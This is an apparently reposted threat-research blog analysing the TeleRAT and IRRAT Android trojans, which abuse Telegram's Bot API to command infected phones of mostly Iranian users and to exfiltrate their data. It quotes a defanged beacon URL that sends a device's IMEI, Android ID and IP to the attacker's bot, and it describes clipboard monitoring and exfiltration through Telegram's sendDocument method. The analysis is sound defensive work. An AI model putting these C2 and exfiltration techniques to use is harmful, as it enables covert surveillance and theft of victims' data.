标题 | 简介 | 类型 | 公开时间 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
详情 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
[SAFE-ID: JIWO-2024-1400] 作者: ecawen 发表于: [2018-03-25]
本文共 [1195] 位读者顶过
Summary Telegram Bots are special accounts that do not require an additional phone number to setup and are generally used to enrich Telegram chats with content from external services or to get customized notifications and news. And while Android malware abusing Telegram’s Bot API to target Iranian users is not fresh news (the emergence of a Trojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these Telegram Bots were being abused to command and control malicious Android applications. This blog details our findings navigating through some Operational Security (OPSEC) fails while sifting through multiple malicious APK variants abusing Telegram’s Bot API; including the discovery of a new Trojan we’ve named “TeleRAT”. TeleRAT not only abuses Telegram’s Bot API for Command and Control (C2), it also abuses it for data exfiltration, unlike IRRAT.
What We Already Know- IRRAT Based on previous reports, we know Telegram’s Bot API was already being employed by attackers to steal information ranging from SMS and call history to file listings from infected Android devices. The majority of the apps we saw disguise themselves as an app that tells you how many views your Telegram profile received – needless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such information. We continue to see IRRAT active in the wild to this date. We used the below sample for this analysis.
TeleRAT works by creating and then populating the following files on the phone’s SD Card and sending them to the upload server, after the app’s first launch:
Finally, it reports back to a Telegram bot (identified by a bot ID hardcoded in each RAT’s source code) with the below beacon, and the application icon is then hidden from the phone’s app menu: hxxp://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]?text=نصب جدید\n [IMEI] \nIMEI : :[IMEI]\nAndroid ID : [AndroidID]\nModel : [PhoneModel]\n[IP] \n\nIMEI دستگاه: [IMEI] In the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain commands, as detailed below.
[出自:jiwo.org]
As the table above shows, this IRRAT sample makes use of Telegram’s bot API solely to communicate commands to infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting service. Fortunately for us, these servers had several OPSEC fails. More on that further below.
A New Family- TeleRAT While sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs seemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for C2 but also for exfiltrating stolen information. Figure 1: pivoting in autofocus for applications using the Telegram bot API
We named this new family “TeleRAT” after one of the files it creates on infected devices. We used the below sample for this analysis.
Post-installation TeleRAT creates two files in the app’s internal directory:
The RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the Telegram Bot API with the current date and time. More interestingly, it starts a service that listens for changes made to the Clipboard in the background.
Figure 2: Code snippet that listens for clipboard changes
Finally, the app fetches updates from the Telegram bot API every 4.6 second, listening for the following commands (we used Google Translate for the below Farsi (Persian) translations):
Aside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated data using Telegram’s sendDocument API method.
Figure 3: Code snippet showing the use of the SendDocument Telegram bot API method
TeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on traffic to known upload servers, as all communication (including uploads) is done via the Telegram bot API. However, it still leaves other doors open via Telegram’s bot API, since the API Keys are hardcoded in the APKs. The API allows fetching updates by two means: 1.The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including usernames from which the commands originated. From the bots that were still responding and had an update history (incoming updates are only kept for 24 hours as per Telegram’s policy), we were able to find bot commands originating from four Telegram accounts, shown below. Figure 4: Telegram usernames revealed from bot command histories 2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook. Their policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used certificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world of third party webhosting and open directories. Let’s Encrypt has been notified about this activity. A sample of only a few Webhooks we found are shown below. hxxps://mr-mehran[.]tk/pot/Bot/ in particular appears to be hosting close to 6500 bots, however, we can’t confirm whether they’re all used for malicious purposes. Figure 5: Webhooks found associated with some TeleRAT bots
OPSEC Fails, Distribution Channels & Attribution In our research we were able find what was clearly an image of the botmaster testing out the RAT, based on the Telegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.
Figure 6: Image of botmaster testing out the RAT
We were also able to find exfiltrated messages that confirmed our theory about the test run and reveals a thread in Persian Farsi seemingly discussing bot setup. “صبح ساعت ۶ انلاین شو تا روباته رو امتحان کنیم” Google Translation: “Morning 6 hours online to try the robotage” While investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in the code. One username is seen in the screenshot below.
Figure 7: Telegram channel advertised in source code
Looking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders that ran the entire gamut – from applications that get you likes and followers on Instagram, to ransomware, and even the source code for an unnamed RAT (complete with a video tutorial, shown below).
Figure 8: Screenshot from a Telegram channel advertising & sharing a RAT source code
Aside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon somethreads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum is frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we came across.
Figure 9: Advertisement for sale of a Telegram bot control library
The forum goes the extra mile to mention all content is in accordance with Iran’s laws. However, it’s hard to see any non-malicious use for some of the code advertised there or written by developers that frequent it – for instance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet in Figure 3 further above).
Figure 10: Forum Disclaimer
Overall, TeleRAT pieces together code written by several developers, however, due to freely available source code via Telegram channels and being sold on forums, we can’t point to one single actor commanding either IRRAT or TeleRAT and it appears to be the work of several actors possibly operating inside of Iran.
Victimology As we investigated these RATs, we also started looking at how victims were getting infected. Further investigating, we witnessed several third-party Android application stores distributing seemingly legitimate applications like “Telegram Finder”, which supposedly helps users locate and communicate with other uses with specific interests, like knitting. Also, we’ve witnessed several samples distributed and shared via both legitimate and nefarious Iranian Telegram channels.
Figure 11: leIranian third-party application store
Looking closer at the malicious APKs we were able to get an understanding of common application naming conventions and functionality across the board.
Figure 12: ‘Telegram finder’ application
Based on the samples we analysed, the three most common application names for both IRRATand TeleRAT are:
Additionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such as “atom vpn” and “vpn for telegram. There appears to be a total identified victim count of 2,293 at the time of writing, based on the infrastructure we analysed. There appears to be a rather small range of geographically dispersed victims, with 82% of having Iranian phone numbers.
There may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the number of victims likely residing within Iran far exceeds the victim count for any other country.
Conclusion Part of dissecting and understanding new threats involve looking closer at already established campaigns and malware variants. This is a perfect example of just that; looking closer at a previously established malware family to better understand it’s current and possibly changed capabilities. While malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family, TeleRAT, hiding entirely behind Telegram’s API to evade network-based detection and exfiltrate data. Leveraging intelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to paint an accurate picture of an ongoing operation leveraging Telegram’s API and targeting users via third party application sites and social media channels. Taking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such as:
Palo Alto Networks customers are protected from this threat by:
APPENDIX
|